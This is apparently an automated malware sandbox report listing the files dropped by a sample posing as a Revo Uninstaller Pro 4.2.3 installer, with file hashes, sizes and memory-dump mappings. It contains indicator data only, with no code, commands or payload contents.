SHA5122e12621b5adfe433ae5a96b82946fe0a3c37e4abd6c319fc2c7c1a1d30449630e5beaab515ea0316f19883ba7c4ad7519b5d6facf47b69be940de8e96c9fe274
-
C:\ProgramData\WsrD\iMtu_gQB.exeFilesize
1.9MB
MD5dd0146c74694b0d0a32bab320a8a9ee5
SHA1e706f8d4f153b5c60e502f947bded7950f19a901
SHA256429955ad9594118c2d2120d9ed0a0c2d68ed0b605dd948cc8f29055f45ca4035
SHA51272bb8daa6eec9edb871dc515049e82851aec29e8d0828093a214a893e210342d5b66b5bed2ee9c27b5463ad5b29df2639078f42a44357ffd5c62cc10b951b1b1
-
C:\ProgramData\WsrD\main.batFilesize
407B
MD5d6b76e5702e5878373d5ef3078aee188
SHA1ab4af65c920efb012d698a48dc65156c12213c12
SHA256426beead9653cd7081fe00afe57690b84bb419e43825943251af3aae52a39465
SHA512fa2d19be96ad40b37b01ed71f3d4359a84738e371e16f1fef933a3f77b3a856a6ad27b055cebb977b1ee772a82e070754b856f39023b8f55522d8e8b589eec03
-
C:\Users\Admin\AppData\Local\Temp\is-DUIEU.tmp\Revo Uninstaller Pro 4.2.3.tmpFilesize
1.2MB
MD5d0bf64e27284709966a4e2efef3233ef
SHA1f3d6c99e57ae9dda35fc24bbf4c1eb1e08a875f0
SHA2562019350b1451f4653d27c33b1c034155ce81534f318cd2e3591dd2ee73c77f09
SHA5124ef3c96a47327c6a061b3b71451018e83936670efd7eb17d60b5a834218ae39614d8c68cb2c0b31a423742a6d8e41eabcecea3e13d5fad728f8745bd9dc2984b
-
C:\Users\Admin\AppData\Local\Temp\is-IBDN6.tmp\16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmpFilesize
2.5MB
MD5d0e24e6d7017127bea02bb0160229bee
SHA134350e5b7f268797b2a7ec56390c2228f841b37b
SHA256ca0a5b43e255d0fa7205be3437ea706eda966dd1839ae01d1de1d3b62f832994
SHA512f5c2edc35c2e43e199c2d4d1d904d9b06cc238b99a6f691f5a9c820c8ed0db77346158ae41237f0086a5009012202bdab4b533b42223f72837c461a499be5c86
-
\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exeFilesize
16.1MB
MD51540ebe79933021c71b37d11ca590c6e
SHA15c3f54e29894d5d973e5a06d9b9cf53f723bcacf
SHA2564c4258c10a1e7a0e7ab5529e68467cf23f5835621cff6dae204da456858d622a
SHA51243ffc343ac95b52d62f2e918e8c5d7a65fd59a5f165643dbfadc4610b50d1460bdf561ab6ac0c02aa587abc0992acbaa2af6ef73f1b2ac75371d6d30292bb2d5
-
\ProgramData\WsrD\7z.dllFilesize
1.6MB
MD572491c7b87a7c2dd350b727444f13bb4
SHA11e9338d56db7ded386878eab7bb44b8934ab1bc7
SHA25634ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891
SHA512583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511
-
\ProgramData\WsrD\7z.dllFilesize
1.6MB
MD572491c7b87a7c2dd350b727444f13bb4
SHA11e9338d56db7ded386878eab7bb44b8934ab1bc7
SHA25634ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891
SHA512583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511
-
\ProgramData\WsrD\7z.dllFilesize
1.6MB
MD572491c7b87a7c2dd350b727444f13bb4
SHA11e9338d56db7ded386878eab7bb44b8934ab1bc7
SHA25634ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891
SHA512583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511
-
\ProgramData\WsrD\7z.dllFilesize
1.6MB
MD572491c7b87a7c2dd350b727444f13bb4
SHA11e9338d56db7ded386878eab7bb44b8934ab1bc7
SHA25634ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891
SHA512583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511
-
\ProgramData\WsrD\7z.exeFilesize
458KB
MD5619f7135621b50fd1900ff24aade1524
SHA16c7ea8bbd435163ae3945cbef30ef6b9872a4591
SHA256344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2
SHA5122c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628
-
\ProgramData\WsrD\iMtu_gQB.exeFilesize
1.9MB
MD5dd0146c74694b0d0a32bab320a8a9ee5
SHA1e706f8d4f153b5c60e502f947bded7950f19a901
SHA256429955ad9594118c2d2120d9ed0a0c2d68ed0b605dd948cc8f29055f45ca4035
SHA51272bb8daa6eec9edb871dc515049e82851aec29e8d0828093a214a893e210342d5b66b5bed2ee9c27b5463ad5b29df2639078f42a44357ffd5c62cc10b951b1b1
-
\Users\Admin\AppData\Local\Temp\4acacee3-cefe-4dab-b6f1-01f9a63ec79a\e.dllFilesize
94KB
MD514ff402962ad21b78ae0b4c43cd1f194
SHA1f8a510eb26666e875a5bdd1cadad40602763ad72
SHA256fb9646cb956945bdc503e69645f6b5316d3826b780d3c36738d6b944e884d15b
SHA512daa7a08bf3709119a944bce28f6ebdd24e54a22b18cd9f86a87873e958df121a3881dcdd5e162f6b4e543238c7aef20f657c9830df01d4c79290f7c9a4fcc54b
-
\Users\Admin\AppData\Local\Temp\is-DUIEU.tmp\Revo Uninstaller Pro 4.2.3.tmpFilesize
1.2MB
MD5d0bf64e27284709966a4e2efef3233ef
SHA1f3d6c99e57ae9dda35fc24bbf4c1eb1e08a875f0
SHA2562019350b1451f4653d27c33b1c034155ce81534f318cd2e3591dd2ee73c77f09
SHA5124ef3c96a47327c6a061b3b71451018e83936670efd7eb17d60b5a834218ae39614d8c68cb2c0b31a423742a6d8e41eabcecea3e13d5fad728f8745bd9dc2984b
-
\Users\Admin\AppData\Local\Temp\is-IBDN6.tmp\16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmpFilesize
2.5MB
MD5d0e24e6d7017127bea02bb0160229bee
SHA134350e5b7f268797b2a7ec56390c2228f841b37b
SHA256ca0a5b43e255d0fa7205be3437ea706eda966dd1839ae01d1de1d3b62f832994
SHA512f5c2edc35c2e43e199c2d4d1d904d9b06cc238b99a6f691f5a9c820c8ed0db77346158ae41237f0086a5009012202bdab4b533b42223f72837c461a499be5c86
-
\Users\Admin\AppData\Local\Temp\is-IR1AC.tmp\_isetup\_iscrypt.dllFilesize
2KB
MD5a69559718ab506675e907fe49deb71e9
SHA1bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA2562f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63
-
memory/112-110-0x0000000000000000-mapping.dmp
-
memory/304-55-0x0000000000400000-0x00000000004CE000-memory.dmpFilesize
824KB
-
memory/304-66-0x0000000000400000-0x00000000004CE000-memory.dmpFilesize
824KB
-
memory/304-54-0x0000000075DB1000-0x0000000075DB3000-memory.dmpFilesize
8KB
-
memory/432-116-0x0000000000000000-mapping.dmp
-
memory/520-87-0x0000000000000000-mapping.dmp
-
memory/580-112-0x0000000000000000-mapping.dmp
-
memory/664-72-0x0000000000000000-mapping.dmp
-
memory/744-103-0x0000000000000000-mapping.dmp
-
memory/760-82-0x0000000000000000-mapping.dmp
-
memory/880-98-0x0000000000000000-mapping.dmp
-
memory/888-101-0x0000000000000000-mapping.dmp
-
memory/948-117-0x0000000000000000-mapping.dmp
-
memory/972-121-0x0000000000000000-mapping.dmp
-
memory/1004-81-0x0000000000000000-mapping.dmp
-
memory/1112-88-0x0000000000000000-mapping.dmp
-
memory/1248-93-0x0000000000000000-mapping.dmp
-
memory/1256-106-0x0000000000000000-mapping.dmp
-
memory/1268-108-0x0000000000000000-mapping.dmp
-
memory/1276-79-0x0000000000000000-mapping.dmp
-
memory/1280-94-0x0000000000000000-mapping.dmp
-
memory/1328-92-0x0000000000000000-mapping.dmp
-
memory/1364-95-0x0000000000000000-mapping.dmp
-
memory/1416-84-0x0000000000000000-mapping.dmp
-
memory/1424-91-0x0000000000000000-mapping.dmp
-
memory/1436-97-0x0000000000000000-mapping.dmp
-
memory/1484-124-0x0000000000000000-mapping.dmp
-
memory/1504-96-0x0000000000000000-mapping.dmp
-
memory/1540-105-0x0000000000000000-mapping.dmp
-
memory/1544-104-0x0000000000000000-mapping.dmp
-
memory/1548-136-0x0000000000000000-mapping.dmp
-
memory/1572-102-0x0000000000000000-mapping.dmp
-
memory/1608-75-0x0000000000000000-mapping.dmp
-
memory/1616-113-0x0000000000000000-mapping.dmp
-
memory/1628-111-0x0000000000000000-mapping.dmp
-
memory/1648-115-0x0000000000000000-mapping.dmp
-
memory/1668-89-0x0000000000000000-mapping.dmp
-
memory/1732-143-0x0000000000000000-mapping.dmp
-
memory/1732-146-0x0000000000C10000-0x0000000000DF0000-memory.dmpFilesize
1.9MB
-
memory/1732-148-0x0000000000BB0000-0x0000000000BDC000-memory.dmpFilesize
176KB
-
memory/1732-151-0x0000000074670000-0x00000000746F0000-memory.dmpFilesize
512KB
-
memory/1756-118-0x0000000000000000-mapping.dmp
-
memory/1772-90-0x0000000000000000-mapping.dmp
-
memory/1780-109-0x0000000000000000-mapping.dmp
-
memory/1864-85-0x0000000000000000-mapping.dmp
-
memory/1876-128-0x0000000000000000-mapping.dmp
-
memory/1880-83-0x0000000000000000-mapping.dmp
-
memory/1916-132-0x0000000000000000-mapping.dmp
-
memory/1916-86-0x0000000000000000-mapping.dmp
-
memory/1940-62-0x0000000074491000-0x0000000074493000-memory.dmpFilesize
8KB
-
memory/1940-58-0x0000000000000000-mapping.dmp
-
memory/1964-120-0x0000000000000000-mapping.dmp
-
memory/1996-114-0x0000000000000000-mapping.dmp
-
memory/2008-145-0x0000000000400000-0x0000000000438000-memory.dmpFilesize
224KB
-
memory/2008-64-0x0000000000000000-mapping.dmp
-
memory/2008-68-0x0000000000400000-0x0000000000438000-memory.dmpFilesize
224KB
-
memory/2020-107-0x0000000000000000-mapping.dmp
-
memory/2036-99-0x0000000000000000-mapping.dmp